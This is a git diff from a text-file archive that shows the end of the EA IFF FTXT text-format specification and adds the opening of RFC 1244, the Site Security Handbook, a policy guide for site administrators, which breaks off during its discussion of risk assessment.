DRAFT DRAFT +DRAFT DRAFT DRAFT + +1. Introduction + +This memo is the IFF supplement for FORM FTXT. An FTXT is an IFF "data +section" or "FORM type" which can be an IFF file or a part of one containing +a stream of text plus optional formatting information."EA IFF 85" +is Electronic Arts' standard for interchange format files. (See the +IFF reference.) + +An FTXT is an archival and interchange representation designed for +three uses. The simplest use is for a "console device" or "glass teletype" +(the minimal 2-D text layout means): a stream of "graphic" ("printable") +characters plus positioning characters "space" ("SP") and line terminator +("LF"). This is not intended for cursor movements on a screen although +it does not conflict with standard cursor-moving characters. The second +use is text that has explicit formatting information (or "looks") +such as font family and size, typeface, etc. The third use is as the +lowest layer of a structured document that also has "inherited" styles +to implicitly control character looks. For that use, FORMs FTXT would +be embedded within a future document FORM type. The beauty of FTXT +is that these three uses are interchangeable, that is, a program written +for one purpose can read and write the others' files. So a word processor +does not have to write a separate plain text file to communicate with +other programs. + +Text is stored in one or more "CHRS" chunks inside an FTXT. Each CHRS +contains a stream of 8-bit text compatible with ISO and ANSI data +interchange standards. FTXT uses just the central character set from +the ISO/ANSI standards. (These two standards are henceforth called +"ISO/ANSI" as in "see the ISO/ANSI reference".) + +Since it's possible to extract just the text portions from future +document FORM types, programs can exchange data without having to +save both plain text and formatted text representations. + +Character looks are stored as embedded control sequences within CHRS +chunks. This document specifies which class of control sequences to +use: the CSI group. This document does not yet specify their meanings, +e.g. which one means "turn on italic face". Consult ISO/ANSI. + +Section 2 defines the chunk types character stream "CHRS" and font +specifier "FONS". These are the "standard" chunks. Specialized chunks +for private or future needs can be added later. Section 3 outlines +an FTXT reader program that strips a document down to plain unformatted +text. Appendix A is a code table for the 8-bit ISO/ANSI character +set used here. Appendix B is an example FTXT shown as a box diagram. +Appendix C is a racetrack diagram of the syntax of ISO/ANSI control +sequences. + + +Reference: + +Amiga[tm] is a trademark of Commodore-Amiga, Inc. + +Electronic Arts[tm] is a trademark of Electronic Arts. + +IFF: "EA IFF 85" Standard for Interchange Format Files describes the +underlying conventions for all IFF files. + +ISO/ANSI: ISO/DIS 6429.2 and ANSI X3.64-1979. International Organization +for Standardization (ISO) and American National Standards Institute +(ANSI) data-interchange standards. The relevant parts of these two +standards documents are identical. ISO standard 2022 is also relevant. + + +2. Standard Data and Property Chunks + +The main contents of a FORM FTXT is in its character stream "CHRS" +chunks. Formatting property chunks may also appear. The only formatting +property yet defined is "FONS", a font specifier. A FORM FTXT with +no CHRS represents an empty text stream. A FORM FTXT may contain nested +IFF FORMs, LISTs, or CATs, although a "stripping" reader (see section +3) will ignore them. + +Character Set + +FORM FTXT uses the core of the 8-bit character set defined by the +ISO/ANSI standards cited at the start of this document. (See Appendix +A for a character code table.) This character set is divided into +two "graphic" groups plus two "control" groups. Eight of the control +characters begin ISO/ANSI standard control sequences. (See "Control +Sequences", below.) Most control sequences and control characters +are reserved for future use and for compatibility with ISO/ANSI. Current +reader programs should skip them. + +% C0 is the group of control characters in the range NUL (hex +0) through hex 1F. Of these, only LF (hex 0A) and ESC (hex 1B) are +significant. ESC begins a control sequence. LF is the line terminator, +meaning "go to the first horizontal position of the next line". All +other C0 characters are not used. In particular, CR (hex 0D) is not +recognized as a line terminator. + +% G0 is the group of graphic characters in the range hex 20 through +hex 7F. SP (hex 20) is the space character. DEL (hex 7F) is the delete +character which is not used. The rest are the standard ASCII printable +characters "!" (hex 21) through "~" (hex 7E). + +% C1 is the group of extended control characters in the range +hex 80 through hex 9F. Some of these begin control sequences. The +control sequence starting with CSI (hex 9B) is used for FTXT formatting. +All other control sequences and C1 control characters are unused. + +% G1 is the group of extended graphic characters in the range +NBSP (hex A0) through "X" (hex FF). It is one of the alternate graphic +groups proposed for ISO/ANSI standardization. + +Control Sequences + +Eight of the control characters begin ISO/ANSI standard "control sequences" +(or "escape sequences"). These sequences are described below and diagrammed +in Appendix C. + +G0 ::= (SP through DEL) +G1 ::= (NBSP through "X") + +ESC-Seq ::= ESC (SP through "/")* ("0" through "~") +ShiftToG2 ::= SS2 G0 +ShiftToG3 ::= SS3 G0 +CSI-Seq ::= CSI (SP through "?")* ("@" through "~") +DCS-Seq ::= (DCS | OSC | PM | APC) (SP through "~" | G1)* ST + +"ESC-Seq" is the control sequence ESC (hex 1B), followed by zero or +more characters in the range SP through "/S (hex 20 through hex 2F), +followed by a character in the range "0" through "~" (hex 30 through +hex 7E). These sequences are reserved for future use and should be +skipped by current FTXT reader programs. + +SS2 (hex 8E) and SS3 (hex 8F) shift the single following G0 character +into yet-to-be-defined graphic sets G2 and G3, respectively. These +sequences should not be used until the character sets G2 and G3 are +standardized. A reader may simply skip the SS2 or SS3 (taking the +following character as a corresponding G0 character) or replace the +two-character sequence with a character like "?" to mean "absent". + +FTXT uses "CSI-Seq" control sequences to store character formatting +(font selection by number, type face, and text size) and perhaps layout +information (position and rotation). "CSI-Seq" control sequences start +with CSI (the "control sequence introducer", hex 9B). Syntactically, +the sequence includes zero or more characters in the range SP through +"?" (hex 20 through hex 3F) and a concluding character in the range +"@" through "~" (hex 40 through hex 7E). These sequences may be skipped +by a minimal FTXT reader, i.e. one that ignores formatting information. + +Note: A future FTXT standardization document will explain the uses +of CSI-Seq sequences for setting character face (light weight vs. +medium vs. bold, italic vs. upright, height, pitch, position, and +rotation). For now, consult the ISO/ANSI references. + +"DCS-Seq" is the control sequences starting with DCS (hex 90), OSC +(hex 9D), PM (hex 9E), or APC (hex 9F), followed by zero or more characters +each of which is in the range SP through "~" (hex 20 through hex 7E) +or else a G1 character, and terminated by an ST (hex 9C). These sequences +are reserved for future use and should be skipped by current FTXT +reader programs. + +Data Chunk CHRS + +A CHRS chunk contains a sequence of 8-bit characters abiding by the +ISO/ANSI standards cited at the start of this document. This includes +the character set and control sequences as described above and summarized +in Appendicies A and C. + +A FORM FTXT may contain any number of CHRS chunks. Taken together, +they represent a single stream of textual information. That is, the +contents of CHRS chunks are effectively concatenated except that (1) +each control sequence must be completely within a single CHRS chunk, +and (2) any formatting property chunks appearing between two CHRS +chunks affects the formatting of the latter chunk's text. Any formatting +settings set by control sequences inside a CHRS carry over to the +next CHRS in the same FORM FTXT. All formatting properties stop at +the end of the FORM since IFF specifies that adjacent FORMs are independent +of each other (although not independent of any properties inherited +from an enclosing LIST or FORM). + +Property Chunk FONS + +The optional property "FONS" holds a FontSpecifier as defined in the +C declaration below. It assignes a font to a numbered "font register" +so it can be referenced by number within subsequent CHRS chunks. (This +function is not provided within the ISO and ANSI standards.) The font +specifier gives both a name and a description for the font so the +recipient program can do font substitution. + +By default, CHRS text uses font 1 until it selects another font. A +minimal text reader always uses font 1. If font 1 hasn't been specified, +the reader may use the local system font as font 1. + + typedef struct { + UBYTE id; + /* 0 through 9 is a font id number referenced by an + * SGR control sequence selective parameter of 10 + * through 19. Other values are reserved for future + * standardization. + */ + UBYTE pad1; /* reserved for future use; store 0 here */ + UBYTE proportional; + /* proportional font? 0 = unknown, 1 = no, 2 = yes */ + UBYTE serif; + /* serif font? 0 = unknown, 1 = no, 2 = yes */ + char name[]; + /* A NULL-terminated string naming preferred font. */ + } FontSpecifier; + +Fields are filed in the order shown. The UBYTE fields are byte-packed +(2 per 16-bit word). The field pad1 is reserved for future standardization. +Programs should store 0 there for now. + +The field proportional indicates if the desired font is proportional +width as opposed to fixed width. The field serif indicates if the +desired font is serif as opposed to sans serif. [Issue: Discuss font +substitution!] + +Future Properties + +New optional property chunks may be defined in the future to store +additional formatting information. They will be used to represent +formatting not encoded in standard ISO/ANSI control sequences and +for "inherited" formatting in structured documents. Text orientation +might be one example. + +Positioning Units + +Unless otherwise specified, position and size units used in FTXT formatting +properties and control sequences are in decipoints (720 decipoints/inch). +This is ANSI/ISO Positioning Unit Mode (PUM) 2. While a metric standard +might be nice, decipoints allow the existing U.S.A. typographic units +to be encoded easily, e.g. "12 points" is "120 decipoints". + + +3. FTXT Stripper + +An FTXT reader program can read the text and ignore all formatting +and structural information in a document FORM that uses FORMs FTXT +for the leaf nodes. This amounts to stripping a document down to a +stream of plain text. It would do this by skipping over all chunks +except FTXT.CHRS (CHRS chunks found inside a FORM FTXT) and within +the FTXT.CHRS chunks skipping all control characters and control sequences. +(Appendix C diagrams this text scanner.) It may also read FTXT.FONS +chunks to find a description for font 1. + +Here's a Pascal-ish program for an FTXT stripper. Given a FORM (a +document of some kind), it scans for all FTXT.CHRS chunks. This would +likely be applied to the first FORM in an IFF file. + +PROCEDURE ReadFORM4CHRS(); {Read an IFF FORM for FTXT.CHRS chunks.} +BEGIN +IF the FORM's subtype = "FTXT" + THEN ReadFTXT4CHRS() + ELSE WHILE something left to read in the FORM DO BEGIN + read the next chunk header; + CASE the chunk's ID OF + "LIST", "CAT ": ReadCAT4CHRS(); + "FORM": ReadFORM4CHRS(); + OTHERWISE skip the chunk's body; + END + END +END; + +{Read a LIST or CAT for all FTXT.CHRS chunks.} +PROCEDURE ReadCAT4CHRS(); + BEGIN +WHILE something left to read in the LIST or CAT DO BEGIN + read the next chunk header; + CASE the chunk's ID OF + "LIST", "CAT ": ReadCAT4CHRS(); + "FORM": ReadFORM4CHRS(); + "PROP": IF we're reading a LIST AND the PROP's subtype = +"FTXT" + THEN read the PROP for "FONS" chunks; + OTHERWISE error--malformed IFF file; + END + END +END; + +PROCEDURE ReadFTXT4CHRS(); {Read a FORM FTXT for CHRS chunks.} +BEGIN +WHILE something left to read in the FORM FTXT DO BEGIN + read the next chunk header; + CASE the chunk's ID OF + "CHRS": ReadCHRS(); + "FONS": BEGIN + read the chunk's contents into a FontSpecifier variable; + IF the font specifier's id = 1 THEN use this font; + END; + OTHERWISE skip the chunk's body; + END + END +END; + +{Read an FTXT.CHRS. Skip all control sequences and unused control +chars.} +PROCEDURE ReadCHRS(); +BEGIN +WHILE something left to read in the CHRS chunk DO + CASE read the next character OF + LF: start a new output line; + ESC: SkipControl([' '..'/'], ['0'..'~']); + IN [' '..'~'], IN [NBSP..'X']: output the character; + SS2, SS3: ; {Just handle the following G0 character + directly, ignoring the shift to G2 or G3.} + CSI: SkipControl([' '..'?'], ['@'..'~']); + DCS, OSC, PM, APC: SkipControl([' '..'~'] + [NBSP..'X'], [ST]); + END +END; + +{Skip a control sequence of the format (rSet)* (tSet), i.e. any number +of characters in the set rSet followed by a character in the set tSet.} +PROCEDURE SkipControl(rSet, tSet); +VAR c: CHAR; +BEGIN +REPEAT c := read the next character + UNTIL c NOT IN rSet; +IF c NOT IN tSet + THEN put character c back into the input stream; +END + +The following program is an optimized version of the above routines +ReadFORM4CHRS and ReadCAT4CHRS for the case where you're ignoring +fonts as well as formatting. It takes advantage of certain facts of +the IFF format to read a document FORM and its nested FORMs, LISTs, +and CATs without a stack. In other words, it's a hack that ignores +all fonts and faces to cheaply get to the plain text of the document. + +{Cheap scan of an IFF FORM for FTXT.CHRS chunks.} +PROCEDURE ScanFORM4CHRS(); +BEGIN +IF the document FORM's subtype = "FTXT" + THEN ReadFTXT4CHRS() + ELSE WHILE something left to read in the FORM DO BEGIN + read the next chunk header; + IF it's a group chunk (LIST, FORM, PROP, or CAT) + THEN read its subtype ID; + CASE the chunk's ID OF + "LIST", "CAT ":; {NOTE: See explanation below.*} + "FORM": IF this FORM's subtype = "FTXT" THEN + ReadFTXT4CHRS() + ELSE; {NOTE: See explanation below.*} + OTHERWISE skip the chunk's body; + END + END +END; + +*Note: This implementation is subtle. After reading a group header +other than FORM FTXT it just continues reading. This amounts to reading +all the chunks inside that group as if they weren't nested in a group. + + +Appendix A: Character Code Table + +This table corresponds to the ISO/DIS 6429.2 and ANSI X3.64-1979 8-bit +character set standards. Only the core character set of those standards +is used in FTXT. + +Two G1 characters aren't defined in the standards and are shown as +dark gray entries in this table. Light gray shading denotes control +characters. (DEL is a control character although it belongs to the +graphic group G0.) The following five rare G1 characters are left +blank in the table below due to limitations of available fonts: hex +A8, D0, DE, F0, and FE. + + + + ISO/DIS 6429.2 and ANSI X3.64-1979 Character Code Table + + + (figure named "TextTable", viewable by ShowILBM or SeeILBM) + + +[_____] [_______________________] [_____] [____________________________] +Control Grapic Group Control Graphic Group + Group G0 Group G1 + C0 C1 + +"NBSP" is a "non-breaking space" +"SHY" is a "soft-hyphen" + + + +Appendix B. FTXT Example + +Here's a box diagram for a simple example: "The quick brown fox jumped.Four +score and seven", written in a proportional serif font named "Roman". + + + +-----------------------------------+ + |'FORM' 24070 | FORM 24070 ILBM + +-----------------------------------+ + |'ILBM' | + +-----------------------------------+ + | +-------------------------------+ | + | | 'BMHD' 20 | | .BMHD 20 + | | 320, 200, 0, 0, 3, 0, 0, ... | | + | | ------------------------------+ | + | | 'CMAP' 21 | | .CMAP 21 + | | 0, 0, 0; 32, 0, 0; 64,0,0; .. | | + | +-------------------------------+ | + | +-------------------------------+ | + | |'BODY' 24000 | | .BODY 24000 + | |0, 0, 0, ... | | + | +-------------------------------+ | + +-----------------------------------+ + +The "0" after the CMAP chunk is a pad byte. + + + + +Appendix B. Standards Committee + +The following people contributed to the design of this IFF standard: + +Bob "Kodiak" Burns, Commodore-Amiga +R. J. Mical, Commodore-Amiga +Jerry Morrison, Electronic Arts +Greg Riker, Electronic Arts +Steve Shaw, Electronic Arts +Barry Walsh, Commodore-Amiga + + + +Appendix C. ISO/ANSI Control Sequences + +This is a racetrack diagram of the ISO/ANSI characters and control +sequences as used in FTXT CHRS chunks. + + line terminator +-----+-------------------> LF ---------------------------------------> + | ESC-Seq + +-------------------> ESC ---+>----------------+--> 0 thru ~ ---> + | | | + | +-- SP thru / <---+ + | printable + +---------------+---> SP thru ~ --+->---------------------------> + | | | + | +---> G1 -------->+ + | shift to G2 + +-------------------> SS2 ----> G0 ---> (produces a G2 character) + | shift to G3 + +-------------------> SS3 ----> G0 ---> (produces a G3 character) + | CSI-Seq + +-------------------> CSI ---+>----------------+--> @ thru ~ ---> + | | | + | +-- SP thru ? <---+ + | DCS-Seq + +----------> DCS,OSC,PM,or APC --+>-------------+--+-> ST -+----> + | | | | | + | +- SP thru ~ <-+ +-> G1 -+ + | discard + +----------> any other character -------------------------------> + + + +Of the various control sequences, only CSI-Seq is used for FTXT character +formatting information. The others are reserved for future use and +for compatibility with ISO/ANSI standards. Certain character sequences +are syntactically malformed, e.g. CSI followed by a C0, C1, or G1 +character. Writer programs should not generate reserved or malformed +sequences and reader programs should skip them. + +Consult the ISO/ANSI standards for the meaning of the CSI-Seq control +sequences. + +The two character set shifts SS2 and SS3 may be used when the graphic +character groups G2 and G3 become standardized. + diff --git a/textfiles.com/computers/fyi-8 b/textfiles.com/computers/fyi-8 new file mode 100644 index 00000000..bfc164b3 --- /dev/null +++ b/textfiles.com/computers/fyi-8 @@ -0,0 +1,5655 @@ +Network Working Group P. Holbrook +Request for Comments: 1244 CICNet +FYI: 8 J. Reynolds + ISI + Editors + July 1991 + + + Site Security Handbook + +Status of this Memo + + This handbook is the product of the Site Security Policy Handbook + Working Group (SSPHWG), a combined effort of the Security Area and + User Services Area of the Internet Engineering Task Force (IETF). + This FYI RFC provides information for the Internet community. It + does not specify an Internet standard. Distribution of this memo is + unlimited. + +Contributing Authors + + The following are the authors of the Site Security Handbook. Without + their dedication, this handbook would not have been possible. + + Dave Curry (Purdue University), Sean Kirkpatrick (Unisys), Tom + Longstaff (LLNL), Greg Hollingsworth (Johns Hopkins University), + Jeffrey Carpenter (University of Pittsburgh), Barbara Fraser (CERT), + Fred Ostapik (SRI NISC), Allen Sturtevant (LLNL), Dan Long (BBN), Jim + Duncan (Pennsylvania State University), and Frank Byrum (DEC). + +Editors' Note + + This FYI RFC is a first attempt at providing Internet users guidance + on how to deal with security issues in the Internet. As such, this + document is necessarily incomplete. There are some clear shortfalls; + for example, this document focuses mostly on resources available in + the United States. In the spirit of the Internet's "Request for + Comments" series of notes, we encourage feedback from users of this + handbook. In particular, those who utilize this document to craft + their own policies and procedures. + + This handbook is meant to be a starting place for further research + and should be viewed as a useful resource, but not the final + authority. Different organizations and jurisdictions will have + different resources and rules. Talk to your local organizations, + consult an informed lawyer, or consult with local and national law + enforcement. These groups can help fill in the gaps that this + document cannot hope to cover. + + + +Site Security Policy Handbook Working Group [Page 1] + +RFC 1244 Site Security Handbook July 1991 + + + Finally, we intend for this FYI RFC to grow and evolve. Please send + comments and suggestions to: ssphwg@cert.sei.cmu.edu. + +Table of Contents + +1. Introduction..................................................... 3 +1.1 Purpose of this Work............................................ 3 +1.2 Audience........................................................ 3 +1.3 Definitions..................................................... 4 +1.4 Related Work.................................................... 4 +1.5 Scope........................................................... 4 +1.6 Why Do We Need Security Policies and Procedures?................ 5 +1.7 Basic Approach.................................................. 7 +1.8 Organization of this Document................................... 7 +2. Establishing Official Site Policy on Computer Security........... 9 +2.1 Brief Overview.................................................. 9 +2.2 Risk Assessment................................................. 10 +2.3 Policy Issues................................................... 13 +2.4 What Happens When the Policy Is Violated........................ 19 +2.5 Locking In or Out............................................... 21 +2.6 Interpreting the Policy......................................... 23 +2.7 Publicizing the Policy.......................................... 23 +3. Establishing Procedures to Prevent Security Problems............. 24 +3.1 Security Policy Defines What Needs to be Protected.............. 24 +3.2 Identifing Possible Problems.................................... 24 +3.3 Choose Controls to Protect Assets in a Cost-Effective Way....... 26 +3.4 Use Multiple Strategies to Protect Assets....................... 26 +3.5 Physical Security............................................... 27 +3.6 Procedures to Recognize Unauthorized Activity................... 27 +3.7 Define Actions to Take When Unauthorized Activity is Suspected.. 29 +3.8 Communicating Security Policy................................... 30 +3.9 Resources to Prevent Security Breaches.......................... 34 +4. Types of Security Procedures..................................... 56 +4.1 System Security Audits.......................................... 56 +4.2 Account Management Procedures................................... 57 +4.3 Password Management Procedures.................................. 57 +4.4 Configuration Management Procedures............................. 60 +5. Incident Handling................................................ 61 +5.1 Overview........................................................ 61 +5.2 Evaluation...................................................... 65 +5.3 Possible Types of Notification.................................. 67 +5.4 Response........................................................ 71 +5.5 Legal/Investigative............................................. 73 +5.6 Documentation Logs.............................................. 77 +6. Establishing Post-Incident Procedures............................ 78 +6.1 Overview........................................................ 78 +6.2 Removing Vulnerabilities........................................ 78 +6.3 Capturing Lessons Learned....................................... 80 + + + +Site Security Policy Handbook Working Group [Page 2] + +RFC 1244 Site Security Handbook July 1991 + + +6.4 Upgrading Policies and Procedures............................... 81 +7. References....................................................... 81 +8. Annotated Bibliography........................................... 83 +8.1 Computer Law.................................................... 84 +8.2 Computer Security............................................... 85 +8.3 Ethics.......................................................... 91 +8.4 The Internet Worm............................................... 93 +8.5 National Computer Security Center (NCSC)........................ 95 +8.6 Security Checklists............................................. 99 +8.7 Additional Publications......................................... 99 +9. Acknlowledgements................................................101 +10. Security Considerations.........................................101 +11. Authors' Addresses..............................................101 + +1. Introduction + +1.1 Purpose of this Work + + This handbook is a guide to setting computer security policies and + procedures for sites that have systems on the Internet. This guide + lists issues and factors that a site must consider when setting their + own policies. It makes some recommendations and gives discussions of + relevant areas. + + This guide is only a framework for setting security policies and + procedures. In order to have an effective set of policies and + procedures, a site will have to make many decisions, gain agreement, + and then communicate and implement the policies. + +1.2 Audience + + The audience for this work are system administrators and decision + makers (who are more traditionally called "administrators" or "middle + management") at sites. This document is not directed at programmers + or those trying to create secure programs or systems. The focus of + this document is on the policies and procedures that need to be in + place to support any technical security features that a site may be + implementing. + + The primary audience for this work are sites that are members of the + Internet community. However, this document should be useful to any + site that allows communication with other sites. As a general guide + to security policies, this document may also be useful to sites with + isolated systems. + + + + + + + +Site Security Policy Handbook Working Group [Page 3] + +RFC 1244 Site Security Handbook July 1991 + + +1.3 Definitions + + For the purposes of this guide, a "site" is any organization that + owns computers or network-related resources. These resources may + include host computers that users use, routers, terminal servers, + PC's or other devices that have access to the Internet. A site may + be a end user of Internet services or a service provider such as a + regional network. However, most of the focus of this guide is on + those end users of Internet services. + + We assume that the site has the ability to set policies and + procedures for itself with the concurrence and support from those who + actually own the resources. + + The "Internet" is those set of networks and machines that use the + TCP/IP protocol suite, connected through gateways, and sharing a + common name and address spaces [1]. + + The term "system administrator" is used to cover all those who are + responsible for the day-to-day operation of resources. This may be a + number of individuals or an organization. + + The term "decision maker" refers to those people at a site who set or + approve policy. These are often (but not always) the people who own + the resources. + +1.4 Related Work + + The IETF Security Policy Working Group (SPWG) is working on a set of + recommended security policy guidelines for the Internet [23]. These + guidelines may be adopted as policy by regional networks or owners of + other resources. This handbook should be a useful tool to help sites + implement those policies as desired or required. However, even + implementing the proposed policies isn't enough to secure a site. + The proposed Internet policies deal only with network access + security. It says nothing about how sites should deal with local + security issues. + +1.5 Scope + + This document covers issues about what a computer security policy + should contain, what kinds of procedures are need to enforce + security, and some recommendations about how to deal with the + problem. When developing a security policy, close attention should + be made not only on the security needs and requirements of the local + network, but also the security needs and requirements of the other + interconnected networks. + + + + +Site Security Policy Handbook Working Group [Page 4] + +RFC 1244 Site Security Handbook July 1991 + + + This is not a cookbook for computer security. Each site has + different needs; the security needs of a corporation might well be + different than the security needs of an academic institution. Any + security plan has to conform to the needs and culture of the site. + + This handbook does not cover details of how to do risk assessment, + contingency planning, or physical security. These things are + essential in setting and implementing effective security policy, but + this document leaves treatment of those issues to other documents. + We will try to provide some pointers in that direction. + + This document also doesn't talk about how to design or implement + secure systems or programs. + +1.6 Why Do We Need Security Policies and Procedures? + + For most sites, the interest in computer security is proportional to + the perception of risk and threats. + + The world of computers has changed dramatically over the past + twenty-five years. Twenty-five years ago, most computers were + centralized and managed by data centers. Computers were kept in + locked rooms and staffs of people made sure they were carefully + managed and physically secured. Links outside a site were unusual. + Computer security threats were rare, and were basically concerned + with insiders: authorized users misusing accounts, theft and + vandalism, and so forth. These threats were well understood and + dealt with using standard techniques: computers behind locked doors, + and accounting for all resources. + + Computing in the 1990's is radically different. Many systems are in + private offices and labs, often managed by individuals or persons + employed outside a computer center. Many systems are connected into + the Internet, and from there around the world: the United States, + Europe, Asia, and Australia are all connected together. + + Security threats are different today. The time honored advice says + "don't write your password down and put it in your desk" lest someone + find it. With world-wide Internet connections, someone could get + into your system from the other side of the world and steal your + password in the middle of the night when your building is locked up. + Viruses and worms can be passed from machine to machine. The + Internet allows the electronic equivalent of the thief who looks for + open windows and doors; now a person can check hundreds of machines + for vulnerabilities in a few hours. + + System administrators and decision makers have to understand the + security threats that exist, what the risk and cost of a problem + + + +Site Security Policy Handbook Working Group [Page 5] + +RFC 1244 Site Security Handbook July 1991 + + + would be, and what kind of action they want to take (if any) to + prevent and respond to security threats. + + As an illustration of some of the issues that need to be dealt with + in security problems, consider the following scenarios (thanks to + Russell Brand [2, BRAND] for these): + + - A system programmer gets a call reporting that a + major underground cracker newsletter is being + distributed from the administrative machine at his + center to five thousand sites in the US and + Western Europe. + + Eight weeks later, the authorities call to inform + you the information in one of these newsletters + was used to disable "911" in a major city for + five hours. + + - A user calls in to report that he can't login to his + account at 3 o'clock in the morning on a Saturday. The + system staffer can't login either. After rebooting to + single user mode, he finds that password file is empty. + By Monday morning, your staff determines that a number + of privileged file transfers took place between this + machine and a local university. + + Tuesday morning a copy of the deleted password file is + found on the university machine along with password + files for a dozen other machines. + + A week later you find that your system initialization + files had been altered in a hostile fashion. + + - You receive a call saying that a breakin to a government + lab occurred from one of your center's machines. You + are requested to provide accounting files to help + trackdown the attacker. + + A week later you are given a list of machines at your + site that have been broken into. + + - A reporter calls up asking about the breakin at your + center. You haven't heard of any such breakin. + + Three days later, you learn that there was a breakin. + The center director had his wife's name as a password. + + + + + +Site Security Policy Handbook Working Group [Page 6] + +RFC 1244 Site Security Handbook July 1991 + + + - A change in system binaries is detected. + + The day that it is corrected, they again are changed. + This repeats itself for some weeks. + + - If an intruder is found on your system, should you + leave the system open to monitor the situation or should + you close down the holes and open them up again later? + + - If an intruder is using your site, should you call law + enforcement? Who makes that decision? If law enforcement asks + you to leave your site open, who makes that decision? + + - What steps should be taken if another site calls you and says + they see activity coming from an account on your system? What + if the account is owned by a local manager? + +1.7 Basic Approach + + Setting security policies and procedures really means developing a + plan for how to deal with computer security. One way to approach + this task is suggested by Fites, et. al. [3, FITES]: + + - Look at what you are trying to protect. + - Look at what you need to protect it from. + - Determine how likely the threats are. + - Implement measures which will protect your assets in a + cost-effective manner. + - Review the process continuously, and improve things every time + a weakness is found. + + This handbook will concentrate mostly on the last two steps, but the + first three are critically important to making effective decisions + about security. One old truism in security is that the cost of + protecting yourself against a threat should be less than the cost + recovering if the threat were to strike you. Without reasonable + knowledge of what you are protecting and what the likely threats are, + following this rule could be difficult. + +1.8 Organization of this Document + + This document is organized into seven parts in addition to this + introduction. + + The basic form of each section is to discuss issues that a site might + want to consider in creating a computer security policy and setting + procedures to implement that policy. In some cases, possible options + are discussed along with the some of the ramifications of those + + + +Site Security Policy Handbook Working Group [Page 7] + +RFC 1244 Site Security Handbook July 1991 + + + choices. As far as possible, this document tries not to dictate the + choices a site should make, since these depend on local + circumstances. Some of the issues brought up may not apply to all + sites. Nonetheless, all sites should at least consider the issues + brought up here to ensure that they do not miss some important area. + + The overall flow of the document is to discuss policy issues followed + by the issues that come up in creating procedures to implement the + policies. + + Section 2 discusses setting official site policies for access to + computing resources. It also goes into the issue of what happens + when the policy is violated. The policies will drive the procedures + that need to be created, so decision makers will need to make choices + about policies before many of the procedural issues in following + sections can be dealt with. A key part of creating policies is doing + some kind of risk assessment to decide what really needs to be + protected and the level of resources that should be applied to + protect them. + + Once policies are in place, procedures to prevent future security + problems should be established. Section 3 defines and suggests + actions to take when unauthorized activity is suspected. Resources + to prevent secruity breaches are also discussed. + + Section 4 discusses types of procedures to prevent security problems. + Prevention is a key to security; as an example, the Computer + Emergency Response Team/Coordination Center (CERT/CC) at Carnegie- + Mellon University (CMU) estimates that 80% or more of the problems + they see have to do with poorly chosen passwords. + + Section 5 discusses incident handling: what kinds of issues does a + site face when someone violates the security policy. Many decisions + will have to made on the spot as the incident occurs, but many of the + options and issues can be discussed in advance. At very least, + responsibilities and methods of communication can be established + before an incident. Again, the choices here are influenced by the + policies discussed in section 2. + + Section 6 deals with what happens after a security violation has been + dealt with. Security planning is an on-going cycle; just after an + incident has occurred is an excellent opportunity to improve policies + and procedures. + + The rest of the document provides references and an annotated + bibliography. + + + + + +Site Security Policy Handbook Working Group [Page 8] + +RFC 1244 Site Security Handbook July 1991 + + +2. Establishing Official Site Policy on Computer Security + +2.1 Brief Overview + + 2.1.1 Organization Issues + + The goal in developing an official site policy on computer + security is to define the organization's expectations of proper + computer and network use and to define procedures to prevent and + respond to security incidents. In order to do this, aspects of + the particular organization must be considered. + + First, the goals and direction of the organization should be + considered. For example, a military base may have very different + security concerns from a those of a university. + + Second, the site security policy developed must conform to + existing policies, rules, regulations and laws that the + organization is subject to. Therefore it will be necessary to + identify these and take them into consideration while developing + the policy. + + Third, unless the local network is completely isolated and + standalone, it is necessary to consider security implications in a + more global context. The policy should address the issues when + local security problems develop as a result of a remote site as + well as when problems occur on remote systems as a result of a + local host or user. + + 2.1.2 Who Makes the Policy? + + Policy creation must be a joint effort by technical personnel, who + understand the full ramifications of the proposed policy and the + implementation of the policy, and by decision makers who have the + power to enforce the policy. A policy which is neither + implementable nor enforceable is useless. + + Since a computer security policy can affect everyone in an + organization, it is worth taking some care to make sure you have + the right level of authority in on the policy decisions. Though a + particular group (such as a campus information services group) may + have responsibility for enforcing a policy, an even higher group + may have to support and approve the policy. + + 2.1.3 Who is Involved? + + Establishing a site policy has the potential for involving every + computer user at the site in a variety of ways. Computer users + + + +Site Security Policy Handbook Working Group [Page 9] + +RFC 1244 Site Security Handbook July 1991 + + + may be responsible for personal password administration. Systems + managers are obligated to fix security holes and to oversee the + system. + + It is critical to get the right set of people involved at the + start of the process. There may already be groups concerned with + security who would consider a computer security policy to be their + area. Some of the types of groups that might be involved include + auditing/control, organizations that deal with physical security, + campus information systems groups, and so forth. Asking these + types of groups to "buy in" from the start can help facilitate the + acceptance of the policy. + + 2.1.4 Responsibilities + + A key element of a computer security policy is making sure + everyone knows their own responsibility for maintaining security. + A computer security policy cannot anticipate all possibilities; + however, it can ensure that each kind of problem does have someone + assigned to deal with it. + + There may be levels of responsibility associated with a policy on + computer security. At one level, each user of a computing + resource may have a responsibility to protect his account. A user + who allows his account to be compromised increases the chances of + compromising other accounts or resources. + + System managers may form another responsibility level: they must + help to ensure the security of the computer system. Network + managers may reside at yet another level. + +2.2 Risk Assessment + + 2.2.1 General Discussion + + One of the most important reasons for creating a computer security + policy is to ensure that efforts spent on security yield cost + effective benefits. Although this may seem obvious, it is + possible to be mislead about where the effort is needed. As an + example, there is a great deal of publicity about intruders on + computers systems; yet most surveys of computer security show that + for most organizations, the actual loss from "insiders" is much + greater. + + Risk analysis involves determining what you need to protect, what + you need to protect it from, and how to protect it. Is is the + process of examining all of your risks, and ranking those risks by + level of severity. This process involves making cost-effective + + + +Site Security Policy Handbook Working Group [Page 10] + +RFC 1244 Site Security Handbook July 1991 + + + decisions on what you want to protect. The old security adage + says that you should not spend more to protect something than it + is actually worth. + + A full treatment of risk analysis is outside the scope of this + document. [3, FITES] and [16, PFLEEGER] provide introductions to + this topic. However, there are two elements of a risk analysis + that will be briefly covered in the next two sections: + + 1. Identifying the assets + 2. Identifying the threats + + For each asset, the basic goals of security are availability, + confidentiality, and integrity. Each threat should be examined + with an eye to how the threat could affect these areas. + + 2.2.2 Identifying the Assets + + One step in a risk analysis is to identify all the things that + need to be protected. Some things are obvious, like all the + various pieces of hardware, but some are overlooked, such as the + people who actually use the systems. The essential point is to + list all things that could be affected by a security problem. + + One list of categories is suggested by Pfleeger [16, PFLEEGER, + page 459]; this list is adapted from that source: + + 1. Hardware: cpus, boards, keyboards, terminals, + workstations, personal computers, printers, disk + drives, communication lines, terminal servers, routers. + + 2. Software: source programs, object programs, + utilities, diagnostic programs, operating systems, + communication programs. + + 3. Data: during execution, stored on-line, 